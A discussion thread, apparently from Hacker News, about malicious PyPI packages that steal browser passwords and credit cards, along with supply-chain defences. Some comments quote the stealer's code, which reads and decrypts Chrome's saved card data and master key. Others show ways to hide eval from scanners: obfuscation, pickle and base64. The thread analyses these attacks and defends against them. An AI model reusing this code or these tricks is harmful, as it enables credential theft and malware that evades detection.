Build machines generally want to be 'online' so they can connect to the internet. They want to connect to the internet so they can access services hosted on the internet. Many of those services use Cloudflare, Akamai, or GitHub. If any of those are down, those services are down. Now it's great that your build machine is online, but the packages it's trying to fetch won't be available because their CDN is offline.

Now if only you had a local caching proxy.


Sometimes I use an air gapped test lab. Setup of certain software and projects is a real pain. Sounds like this approach could help.


It's standard practice in many large companies.


We use an artifact server and our build servers are completely airgapped. We know exactly what dependencies are used across the organisation. We can take centralised action against malicious dependencies.

I wouldn't bother having one if you're small (<25) people. If you start having a centralised Infosec group, then it starts to become necessary.


Airgapped? Really? Every time a build happens, someone physically moves a thumb drive or some other media to/from the build server?

Airgap means not networked, even internally. Not just "blocked" from internet.


Wikipedia[1] offers a slightly relaxed definition, although I agree, I (and my colleagues) abuse the term.

The artifact repository server connects to the internet via a proxy. Build servers have no access to the internet.

[1] https://en.wikipedia.org/wiki/Air_gap_(networking)


Depending on what you're using for package management, an "artifact server" can be as simple as a directory in git or a dumb HTTP server. File names are non-colliding and you don't really need an audit log on that server, because all references are through lock-files in git with hashes (right? RIGHT?), so it basically doesn't matter what's on there.


You should mention this in your interviews. Keeping up to date with the state of the art is implicit for me. If I need to spend months retraining or up training because of company policy I expect to be compensated for that while employed.


We are upfront about it in interviews. We definitely don’t want unhappy developers, but we also don’t want insecure code. We do upgrade libraries but we do so only after analysing risk and impact. None of our developers have spent months training to develop our code.


It seems to me like one low-hanging fruit to make a lot of these kinds of exploits significantly more difficult is language-level control over which libraries are allowed to make outgoing HTTP requests or access the file system. It would be great if I could mark in my requirements.txt that a specific dependency should not be allowed to access the file system or network, and have that transitively apply to everything it calls or eval()'s. Of course, it would still be possible to make malware that exfiltrates data through other channels, but it would be a lot harder.

I am not aware of any languages or ecosystems that do this, so maybe there's some reason this won't work that I'm not thinking of.


Deno (a Node-like runtime by the original author of Node) has a security model kind of like this [0]. It's unfortunately not as granular as I think it should be (it only operates on the module level and not individual dependencies), but it's a start.

[0] https://deno.land/manual/getting_started/permissions


Ryan Dahl (the above-mentioned creator of Deno) gave his second podcast interview ever this spring; it went live June 8th. [1]

It covers a lot of terrain including the connectivity permissions control.

I recommend it as an easy way to learn about Deno and how it is different from Node as it is today.

Node seems to have evolved to handle some of what Deno set out to do at the start. It is worth hearing from Dahl why Deno is still relevant and for what use cases.

Dahl speaks without ego and addresses interesting topics like the company built around Deno and monetization plans.

[1] https://changelog.com/podcast/443


What you want sounds like the way Java sandboxing worked (commonly seen with Java applets). The privileged classes which do the lower-level operations (outgoing network requests, filesystem access, and so on) ask the Java security code to check whether the calling code has permission to do these operations, and that Java security code throws an exception when they're not allowed.


Yes, and also, this is an extraordinarily complex design to implement and get right. Java more or less failed in contexts where it was expected to actually enforce those boundaries reliably - untrusted applets on the web. It's working great in cases where the entire Java runtime and all libraries are at the same trust level and sandboxing/access control measures, if any, are applied outside the whole process - web servers, unsandboxed desktop applications like Bazel or Minecraft, Android applications, etc. Security vulnerabilities in Java-for-running-untrusted-applets happened all the time; security vulnerabilities that require you to update the JRE on your backend web servers are much rarer.

If you make a security boundary, people are going to rely on it / trust it, and if people rely on it, attackers are going to attack it for real. Making attacks harder isn't enough; some attacker will just figure it out, because there's an incentive for them to do so. It is often safer in practice not to set up the boundary at all so that people don't rely on it.


If I’m not mistaken I think that some languages with managed effects allow you to do this through types. For example, in Elm HTTP requests have the type of Cmd Msg and the only way to actually have the IO get executed is to pass that Cmd Msg to the runtime through the update function. This means you can easily get visibility, enforced by the type system, into what your dependencies do and restrict dependencies from making http requests or doing other effects.


> I am not aware of any languages or ecosystems that do this...

Rebol was designed with such a feature - http://www.rebol.com/docs/words/wsecure.html


I started building this at one point. Basically there's an accompanying manifest.toml that specifies permissions for the packages with their checksums, and then it can traverse the dependency graph finding each manifest.toml.

It also generated a manifest.lock so if manifests changed you would know about it.

Then once it built up the sandbox it would execute the build. If no dependencies require networking, for example, it gets no networking, etc.
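Purely as an illustration of the idea (this isn't the syntax of any real tool, just a sketch of what such a per-dependency manifest might declare):

```
# manifest.toml - hypothetical permission declaration for one dependency
[package]
name = "some-crate"
checksum = "sha256:0000000000000000000000000000000000000000000000000000000000000000"

[permissions]
network = false
filesystem = ["read:./assets"]
```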

I stopped working on it because I didn't have time, and it obviously relied on everyone doing the work of writing a manifest.toml and using my tool, plus it only supported rust and crates.io

TBH it seems really easy to solve this problem; it's very well-worn territory - browser extensions have been doing the same thing for decades. Similarly, why can I upload a package with a near-zero string distance to another package's name? Blocking that would help a massive amount against typosquatting.

No one wants to implement it who also implements package managers I guess.


This can be done with capability-based operating system, though it requires running the libraries you want to isolate in a separate process.

On a capability-based OS you whitelist the things a given process can do. For instance, you can give a process the capability to read a given directory and write to a different directory, or give the capability to send http traffic to a specific URL. If you don't explicitly give those capabilities, the process can't do anything.


I've been thinking about this a lot as I consider the scripting language for finl.¹ I had considered an embedded python, but ended up deciding it was too much of a security risk, since, without writing my own python interpreter (something I don't want to do), sandboxing seems to be impossible. Deno is a real possibility or else forking Boa which is a pure Rust implementation of JS.

1. One thing I absolutely do not want to do is replicate the unholy mess that's the TeX macro system. There will be simple macro definitions possible, but I don't plan on making them Turing complete or having the complex expansion rules of TeX.


I was wondering earlier how useful deno's all-or-nothing policies would actually be in the real world. It seems like rules like this (no dep network requests, intranet only, only these ips) are much more useful than "never talk to the web".

For Python this probably won't ever be possible, given the way the import system works and the patching packages can do.


Portmod[0] is a package manager for game modifications (currently Morrowind and Doom), and it runs sandboxed Python scripts to install individual packages. So I think this is possible, but it's not a built-in feature of the runtime as is the case for deno.

[0]: https://gitlab.com/portmod/portmod


This is a great idea, but I'm not sure how it could be implemented without cgroups, which are a pain, especially when you don't have root access.


```
def cs():
    master_key = master()
    login_db = os.environ['USERPROFILE'] + os.sep + \
        r'AppData\Local\Google\Chrome\User Data\default\Web Data'

    shutil.copy2(login_db, "CCvault.db")
    conn = sqlite3.connect("CCvault.db")
    cursor = conn.cursor()

    try:
        cursor.execute("SELECT * FROM credit_cards")
        for r in cursor.fetchall():
            username = r[1]
            encrypted_password = r[4]
            decrypted_password = dpw(
                encrypted_password, master_key)
            expire_mon = r[2]
            expire_year = r[3]
```

Where does master_key come from here? Is Chrome's encryption of sensitive information really as weak as that?


It appears to be:

  def master():
      try:
          with open(os.environ['USERPROFILE'] + os.sep +
                    r'AppData\Local\Google\Chrome\User Data\Local State',
                    "r", encoding='utf-8') as f:
              local_state = f.read()
              local_state = json.loads(local_state)
      except:
          pass
      master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
      master_key = master_key[5:]
      master_key = ctypes.windll.crypt32.CryptUnprotectData(
          (master_key, None, None, None, 0)[1])
      return master_key


What do you expect it to be "encrypted" with? Unless the user is entering a password every time they start the browser, there's nothing unique to a system that other malware can't just extract and use to decrypt the database.


On Mac, you could store the master key in the Keychain. I've been off of Windows for almost a decade so I'm not sure if they have a similar feature.

> Keychain items can be shared only between apps from the same developer.

https://support.apple.com/guide/security/keychain-data-prote...


Pale Moon on Linux uses the GNOME keyring. You have to authenticate against that to get access to your saved passwords.


Windows doesn't have a system-level key store.

Instead, the Windows APIs include a symmetric encryption API (DPAPI) that lets developers supply plaintext and receive ciphertext.

It's then up to developers to persist the ciphertext.

The DPAPI master key is protected by the OS, behind the user's credentials.
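
A rough sketch of using it from Python via pywin32 (my own example, not from the article; the secret and description strings are placeholders):

    import win32crypt  # pywin32; Windows only

    secret = b"hunter2"
    # Encrypt under the current user's DPAPI master key; the OS manages the key.
    blob = win32crypt.CryptProtectData(secret, "my app secret", None, None, None, 0)

    # Any process running as the same user can round-trip it back.
    description, plaintext = win32crypt.CryptUnprotectData(blob, None, None, None, 0)
    assert plaintext == secret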


Isn't it per user though, rather than per developer (like Apple)?

A dodgy PyPI package can call CryptUnprotectData too.


Per login credential, yes.


so that's essentially useless against this sort of attack?


Right, but I wouldn't have expected that processes outside of Chrome could get at its internally managed DB (or encrypted properties), especially if it's using an authenticated (Chrome) user profile.

Doesn't Windows have any application firewalls by default? I thought that was the whole thing that came in with Vista that people were upset about. (Of course, thinking it through, Linux isn't any better, assuming the process is running as the same user.)


If you have untrusted code running on your computer, especially with admin privilege, then it's already game over no matter what you do. Any kind of stored secret can be extracted, and any kind of typed in secret can be keylogged.


This was definitely true a decade ago, but secure elements in processors have opened up all sorts of options. Unfortunately, taking advantage of those is one place where mobile operating systems are far ahead of desktops.


Mobile OS security works by clamping down hard on what the local user can do - by severely restricting your freedom to do what you want with your device, to the point where you can't even access most of the device's file system. It works under the assumption (and reality) that 99% of users out there don't have root access on their phone. At the other end of the spectrum we have the PC, where full freedom to do what we want is just a "sudo" or "run as admin" away - but that comes with a price.


I know in Chrome on Windows, I am asked for my Windows login password if I want to view any saved passwords. Really hope that's not just a "UI" feature, and those passwords really are encrypted.


>Really hope that's not just a "UI" feature, and those passwords really are encrypted.

It's definitely a UI feature. If you want to extract the password, all you have to do is visit the login page, open the developer console, and type $("input[type=password]").value


I meant more at rest. I think even if you use an extension like LastPass with a policy that the user can't see the password, it's still going to show up in developer tools under the POST.


I found a copy on a PyPI mirror and at a glance couldn't find any of the malicious code mentioned: https://pypi.tuna.tsinghua.edu.cn/packages/99/84/7f9560403cd...

Also a copy of noblesse2, which I didn't bother to look into due to obfuscation: https://pypi.tuna.tsinghua.edu.cn/packages/15/59/cbdeed656cf...


Anyone can upload anything to PyPI. This is kind of like saying that you detected malicious packages on GitHub - the question is whether anyone actually ran it.

They say that the packages were downloaded 30,000 times, but automated processes like mirrors can easily inflate this. (As can people doing the exact sort of research they were doing - they themselves downloaded the files from PyPI!) Quoting PyPI maintainer Dustin Ingram https://twitter.com/di_codes/status/1421415135743254533 :

> *And here's your daily reminder that download statistics for PyPI are hugely inflated by mirrors & scrapers. Publish a new package today and you'll get 1000 'downloads' in 24 hours without even telling anyone about it.*


Part of the issue is that FOSS, libraries, and independent package managers with their own repositories have exploded in about every domain. No longer are there a handful of places where software and libraries live. Pick an ecosystem and there are probably one or more levels of package/library management ecosystems below it. Developers have really bought into grabbing a package for everything, leveraging hundreds and thousands of packages, most of which have little to no vetting. Software complexity has been growing for years, but the one benefit in earlier years was that it was concentrated in fairly few areas where many eyes were often watching. You could somewhat rely on the fact that someone had looked through and approved additions to a package repo. It's naive security, but there were more professional eyes you could leverage, lowering overall risk.

Not anymore. It's breakneck speed: leverage every package you can to save resources and glue them together without looking at them in detail, because the entire reason you're using them is that you don't have time. It's not all shops - plenty of teams vet dependencies or roll their own functionality to avoid this - but there's a large world of software out there that blindly trusts everything down the chain, in an era when there should be less trust. Some software shops have never seen a package or library they didn't like and will pull in even trivial-to-implement packages (the benefit of your own implementation being that you know it's secure and won't change under your feet unless an inside threat makes the change). There's a tradeoff to externalizing the costs and tech debt of maintenance onto these systems, the cost being that you take on more risk in various forms.


> Anyone can upload anything to PyPI. This is kind of like saying that you detected malicious packages on GitHub - the question is whether anyone actually ran it.

There's a bigger social problem here. In many communities it has become completely normalized for any dependency to be just added from these types of "anyone can upload" repositories without any kind of due diligence as to provenance or security. It's as if these communities have just given up on that.

For example, if I suggest that a modern web app only use dependencies that ship in Debian (a project that does actually take this kind of thing seriously), many would laugh me out of the building.

The only practical alternative in many cases is to give up trying. It's now rare for projects to properly audit their dependencies because the community at large isn't rallying around doing it. It's a vicious circle.

This kind of incident serves as a valuable regular reminder of the risks that these communities are taking. Dismissing this by saying "anyone can upload" misses the point.


> It's now rare for projects to properly audit their dependencies

In the Python ecosystem, it is at least pretty easy to limit yourself to a handful of developers you trust (e.g. Django developers, Pallets developers, etc.).

In the npm ecosystem, however, I just ran `npx create-react-app`, for instance, and got a node_modules with 1044 subdirectories, an 11,407-line yarn.lock, and "207 vulnerabilities found" from `yarn audit`. Well, what can you possibly do?


>> if I suggest that a modern web app only use dependencies that ship in Debian (a project that does actually take this kind of thing seriously), many would laugh me out of the building

And you are more right, and they are more wrong than they know.

Not only are malicious inserts in code a problem in themselves, if you have failed to properly vet your dependencies and it causes real losses for one of your users/customers, YOU have created a liability for yourself. Sure, many customers may never figure it out, and it might take them a while to prove it in court, but if it even gets to the point where someone is damaged and notices, and decides to do something about it, you have defense costs.

The "whatever" attitude has no place in serious engineering of any kind, and anyone with a "move fast and break things" attitude (unless these tests are properly sandboxed) shows that they are not engaged in any serious engineering.


If anyone wonders about the same for NPM, it is around 400. That's what happened to my almost-empty package.

https://i.imgur.com/Ryr2voN.png


Doesn't installing a Python package from PyPI (optionally) run some of the code in the package? Like "setup.py"? I'd take advantage of that if I were injecting malicious code into a module.


Yep. In fact, I recently had to deal with this monstrosity https://pypi.org/project/awslambdaric whose setup.py invokes a shell script https://github.com/aws/aws-lambda-python-runtime-interface-c...

That shell script runs 'make && make install' on a couple of bundled dependencies, but in principle it could do anything https://github.com/aws/aws-lambda-python-runtime-interface-c...


For what it's worth, npm supports an option "ignore-scripts" for both "npm install" and "npm ci" (the latter of which ensures the installed packages match the integrity hashes from the package-lock.json file).

https://docs.npmjs.com/cli/v7/commands/npm-install/#ignore-s...

https://docs.npmjs.com/cli/v7/commands/npm-ci/#ignore-script...
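
For example:

    npm ci --ignore-scripts

or, to make it the default for a project, put ignore-scripts=true in the project's .npmrc.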


Downloading a Python package (as done by scrapers, mirrors and security analysts) does not run setup.py. Only if the module is installed is this run.

It's analogous to downloading vs. running an executable.


Doing a pip install actually runs the setup.py of the package for a source dist, which means running an executable.

That's not the case for wheels, though, so you can protect yourself by restricting installs to binary distributions with --only-binary (example below).

Also, doing a pip download isn't affected by this issue, but most people do pip install.
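
For example (the package name is a placeholder):

    pip install --only-binary :all: somepackage

With --only-binary :all:, pip refuses to fall back to a source distribution, so no setup.py from the package runs at install time.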


Ah, sure. Just making the distinction that you don't have to actually use a module within your code - installing it, even if you never use it in your own code, runs some of the code in that module.



I wonder how many Python packages have a justifiable reason for using `eval()` to begin with. I've been writing Python professionally for almost a decade and I've never run into a use case where it has been necessary. It's occasionally useful for debugging, but that's all I've ever legitimately considered it for.

It's neat that JFrog can detect evaluation of encoded strings, but I think I'd prefer to just set a static analysis rule which prevents devs from using `eval()` in the first place.
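
A naive sketch of such a rule using the ast module (this only catches direct, literal calls, so it's a baseline rather than a guarantee):

    # Flag direct, literal uses of eval/exec via the AST.
    import ast
    import sys

    BANNED = {"eval", "exec"}

    def check(path):
        tree = ast.parse(open(path, encoding="utf-8").read(), filename=path)
        hits = 0
        for node in ast.walk(tree):
            if (isinstance(node, ast.Call)
                    and isinstance(node.func, ast.Name)
                    and node.func.id in BANNED):
                print(f"{path}:{node.lineno}: call to {node.func.id}()")
                hits += 1
        return hits

    if __name__ == "__main__":
        sys.exit(1 if sum(check(p) for p in sys.argv[1:]) else 0)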


You can always call eval without ever mentioning eval in code:

    __builtins__.__dict__[''.join(chr(x^y^(i+33)) for i,(x,y) in enumerate(zip(*[iter(ord(z) for z in '2vb63qz2')]*2)))]("print('hello, world')")
Maybe there are ways to detect all of the paths, but it feels like a tricky quest down lots of rabbit holes to me.

There are also some fairly big packages that use eval(), like flask, matplotlib, numba, pandas, and plenty of others. Perhaps they could be modified to not use eval, but it might be more common than you expect.


There are plenty of ways you can obfuscate calls to `eval`. `unpickle` is a classic example.
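
For example (with a harmless payload - print stands in for something nastier), unpickling runs whatever callable the data names, with no eval in sight:

    import pickle

    class Payload:
        def __reduce__(self):
            # pickle calls this callable with these args at load time
            return (print, ("code ran during unpickling",))

    blob = pickle.dumps(Payload())
    pickle.loads(blob)   # prints the message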


I don't think there's a good reason to have eval in interpreted languages. Sure, the REPL uses it, but it could be implemented internally to the REPL instead of being exposed in the language.


namedtuple used exec()

(I've also used exec() for some nasty bundling of multiple python files into one before)


http://webcache.googleusercontent.com/search?q=cache%3Ahttps... Google cache still has the malicious package visible FWIW

> This Module Optimises your PC For Python


> This Module Optimises your PC For Python

Well, it does... just not for your Python...


All your Pythons are belonging to us


Our python


> The second payload of the noblesse family is an “Autocomplete” information stealer. All modern browsers support saving passwords and credit card information for the user:

> Browser support for saving passwords and credit card information

> This is very convenient, but the downside is that this information can be leaked by malicious software that got access to the local machine.

I never store CC deets anywhere, not even in a secure password manager vault. I typically type them in manually from the card, as I rarely use a CC (every month or so). I can see why automatically filling in CC info would be useful for people who use their CC a lot.

If I was using it a lot, I would use a non-browser password manager however, since browser secrets can be exfil'd via various means and I trust a non-browser password manager vault more.


Credit cards are insecure by design and worrying about having them stolen from your browser or vault is not worth it in my opinion. You're far more likely to have it compromised from the retailer side no matter how careful you are. Also, it's easy to set up a notification on your phone for every time a card is used, so you can report fraud before any harm is done.


Some online banks (I don't know how widespread this is) allow you to create "virtual cards" that expire either after one purchase or at a specific date (and with a set spending limit). I use them for every single purchase I make online; it's inconvenient, but at least I've never entered my real card info anywhere.


That sounds like a lot of work. At least in the US you are not responsible for fraud. (I think the law may have like a $50 liability thing, but Visa/MC waive). So it's better to just not do this, and every 3-4 years when my CC is stolen, call them up - dispute the charges, get a new number. Takes < 5 minutes and I keep going.

For what it's worth, the 2 times my number got stolen in the last 6 years, one was from a rogue agent at a hotel in Chicago, and one was from a bad website that stored credit cards.


In Portugal, you basically open the app, scan fingerprint to give permission and get a new card.

You can even scan the card via webcam or copy the details to clipboard.

The virtual card also limits itself either to single transaction or single store so it can't be used even if compromised on store level.

It's a pretty simple process (<30 sec) and it's really useful.


> That sounds like a lot of work.

My bank has a browser plugin that can create virtual cards with just a few clicks.

> dispute the charges, get a new number. Takes < 5 minutes and I keep going.

This isn't the case for me; it would take me quite a bit of time over a period of several weeks to update all of the places I use my card if I were using the same number everywhere and it was compromised. I handle a lot of billing. I've had cards compromised at least three times in the past and it's very unpleasant (for me).


Privacy (dot) com offers that as a service and you can use their extension to generate a card without leaving the page.


Exactly this. I just assume my credit card will be stolen or leaked. Nearly every credit card has zero-liability protection too, so there is no use in worrying - this is why I use credit cards.


Liability and protection provided by credit cards is one of the reasons some people suggest using them and never using a debit card. Easier to get money back if it gets stolen from a credit card (assuming some YouTube video I saw was accurate).


I definitely want to avoid having my credit card details stolen. The inconvenience of calling the bank to report fraudulent transactions and then waiting a few weeks for a replacement card to arrive is something to avoid if you value your time.

I save most passwords in the browser, including discord, but not important things like banks and emails. Password manager for that. I think it's foolish of Chrome to offer to save CC details.


In the US, CC has, by law, almost no liability for fraud - it's capped at 50 bucks, and is 0 bucks if you report it before it gets used. They are also easily replaced, so i think many wouldn't go as far as you are.

Debit cards are weirder in their liability (and are extracting money from your bank account, which is harder to get back).

If you report them lost/stolen before someone uses them, it's 0 bucks. Within 2 days of learning about it, it's 50 bucks. More than 2 days but less than 60, 500 bucks. More than 60 days - unlimited liability.

So i'd be a lot more careful with debit cards, at least in the US.

(You are never liable on either for unauthorized transactions when your card is not lost/stolen as long as you report them within 60 days)


Hmm. I understood this to be different, but realizing now I don’t have sources for where I learned this:

* Bank accounts, savings accounts, brokerage accounts, etc. are all unlimited liability

* Lines of credit are all zero liability

I’ve used this as a rule of thumb for many years, and was the initial reason for me switching to 100% credit cards for transactions.


Yeah, i'm telling you based on what the statutes say (the FCBA covers credit cards, the EFTA covers debit)

A short version of it is here: https://www.consumer.ftc.gov/articles/0213-lost-or-stolen-cr...


I would never ever use a debit card outside of the ATM of the bank I belong to.

Credit card? Go wild, use it everywhere.


I use CC for everything. Shop tons online, multiple sites . Store my CC on browser and share that across desktop, laptop, ipad and phones.

In last 10 years I've had one incident were CC company did not automatically deny fraud. Two purchases both refunded to me.


I've been thinking I should probably just memorise my card number. It would take a bit of effort, but it can't be much harder than memorising a phone number, and it's possibly faster than entering my master password to unlock my password manager.


I've memorized my last 2 credit card numbers. Takes about 5-10 minutes and is absolutely worth it!


I’ve done it a number of times without even trying. Problem is if you have to replace it a lot.


What I like about the Mac implementation of storing credit cards is that it requires using touch ID to autofill the credit card info. There's no autofill without explicit user interaction.


This is why I use packages from a Linux distribution - specifically Debian.


On Windows 10, if I want to view the plaintext of a stored password in Chrome, the password of the currently logged-in Windows user is required. So is the password stored encrypted? Just wondering if the same is done for CC information and whether such a practice is effective against malware stealing it.


I've been using GitHub Codespaces for a few months and I'm wondering whether developing in such a remote sandbox is an improvement for security. I feel like it would prevent a Python or npm package from stealing my cookies and credit card numbers.


Elixir recently added hex diff, which I've found quite useful. E.g.: https://diff.hex.pm/diff/jiffy/1.0.7..1.0.8


Can trusted PyPI packages, or packages in other languages, be taken over? Can an author who was once benevolent become malicious, inject code, and push a minor version after they wake up one day?


There once was an adblocker called Nano which was open source and quite popular. The developer sold the ownership, and the new owners injected malware which was then shipped to all Chrome users with the extension.

So I don't see why the same shouldn't work for PyPI packages, and I also don't understand why no one saw this coming. With how many companies have adopted Python, there surely will be a security vendor willing to provide free package screening for the repo.


Why don't they start a partnership with a security company, like they have with a server monitor and Google? Many security vendors use Python somewhere (1), so I'm sure there would be someone willing to cooperate. Scan all packages uploaded and all updates; when there is a detection, put a warning on the page and in the console show a warning like "this package might contain malicious code. continue regardless?" so that typosquatting and code hijacking are mitigated.

1 https://github.com/KasperskyLab?q=&type=&language=python&sor...

https://github.com/CrowdStrike?q=&type=&language=python&sort...

https://github.com/intezer?q=&type=&language=python&sort=


I feel like they could have done a better job hiding the code. Even something as simple as base64-encoding the code, storing it as a constant, and then doing an eval. Scanning for something like the table name credit_cards is simple enough to expose this exploit. Now I'm worried about what other exploits of similar form are out there that remain undetected.
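
Something like this, for instance - the payload here is just a harmless print, decoded from a constant:

    import base64

    # base64 of: print("nothing suspicious here")
    BLOB = "cHJpbnQoIm5vdGhpbmcgc3VzcGljaW91cyBoZXJlIik="
    eval(base64.b64decode(BLOB))  # nothing greppable like "credit_cards" remains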


There is lots of inconsistency about hash behavior across the various repos (PyPI, RubyGems) and tools (Poetry, Bundler).

For a long time Poetry didn't even check the hash. So the safer option is to just maintain these artifacts yourself, so you know what is going on and can have your own policies for maintaining them.
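
For what it's worth, pip does have an opt-in hash-checking mode (the hash below is a placeholder, not a real digest). In requirements.txt:

    requests==2.26.0 \
        --hash=sha256:0000000000000000000000000000000000000000000000000000000000000000

then install with:

    pip install --require-hashes -r requirements.txt

In this mode pip rejects anything unpinned or unhashed.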


I've never heard of these libraries. Anyone know what they did?


holy crap the stuff in: AppData\Local\Google\Chrome\User Data\default\Web Data ... wtf are you thinking google?


The result of having a hiring barrier too high.


How do I check if any of these packages are installed on a system? It seems like Python (the macOS version, the various Homebrew versions) writes packages all over the place, from user-local dirs to /usr/local, etc.


I have some pretty complex feelings about this.

Many people end up at a given programming language because they are fleeing something else, rather than being necessarily drawn to it, and I know that in some senses, Python was my reaction to having to deal with what I didn't like about Perl. One of the larger factors was dealing with CPAN. I was always having to hunt down modules, which would do maybe seventy percent of what I needed, or a another module, that would cover a different seventy percent. And then comes the question of, "Can I get this to run on Windows?"

Meanwhile, Python made hay with its enormous standard library and certainly xkcd made many references to it. Now people tell me that the standard library is where code goes to die and I get sad all over again ...


Nice writeup, but the title flashes to '(1) New Message' and back twice a second. That's kind of silly in my opinion - from whom do I expect the message? I assume from the chatbot at the bottom right corner.

Even so, to talk to it I would need to grant it access to some personal information.

It all ends up leaving a bitter aftertaste. Whatever the message was, why not place it in a block of text somewhere less distracting?

I appreciate the writeup however.


This junk is appearing on more and more websites; at least this one is clearly a bot.

Plenty of sales sites will pretend a human is sending you a message; try to talk back, and all of a sudden you're in a queue waiting for a reply.

Another anti-pattern for the web.


Yeah. The sad thing is, I've never used a single chatbot that was actually helpful. I naturally don't go looking for conversations with chatbots, but recently more and more companies have decided to shut down their email address. So the only way to resolve an issue is by either talking to a chatbot and then (hopefully) a person, or by phoning them (and I'd rather not).

Some chatbots even refuse to let me talk to a person at all due to a bug (the Dutch water utility service). Another asks you to write a message to the human representative and then discards it due to a bug (bol.com).


I've had some success finding the pages or processes I need on a site with virtual assistants, but the design of the website had failed in the first place if I had to resort to that.


It's a billion-dollar anti-pattern that's been sanitized as "conversational commerce". Several large orgs have Intercom, Drift, or other popups infesting their sites... by choice!


> This junk is appearing on more and more web sites, at least this one is clearly a bot.

This is the first time I've seen a page flashing the title like that. Extremely annoying and I closed the page before reading the article to the end. It reminded me of the times when pages used to do that with the browser status bar on the bottom of the window.


Well don't be rude, say hi, you never know if it's a person on the other end. In that case it's ok to open up about the current events in your dogs' life.


Add these to your hosts file and the page will load a lot faster, too:

   0.0.0.0 js.driftt.com
   0.0.0.0 send.webeyez.com sec.webeyez.com
   0.0.0.0 splitting.peacebanana.com flaming.peacebanana.com


I am surprised this doesn’t happen to NPM all the time


How do you know it doesn't?



Oh at last, I can feel slightly less ashamed of being part of the Israeli technology scene.


כל ישראל ערבים זה לזה ("All of Israel are responsible for one another")


I fully believe in this statement, and let me assure you I'm proud to be Israeli. But when NSO articles pop up like mushrooms after rain, I feel sad for a period of time (a feeling I also encounter when I read about Israeli internet gambling companies).


Interesting that all the noted examples assume a Windows host. I like that; people who use Windows deserve the drama they get ;-)


Sometimes they don't get a choice. Especially in a corporate environment.


Oh look, an advertisement.

Also, thank you for causing mass disruption in javaland by shutting down your repos on pretty short notice.

Artifactory may be a good piece of software with a good purpose, not least of which is the public repository security problem, but every company I have been at has used it as a hammer to stifle the use of open source and create a "lords of data" style fiefdom in the company, with tons of procedures.



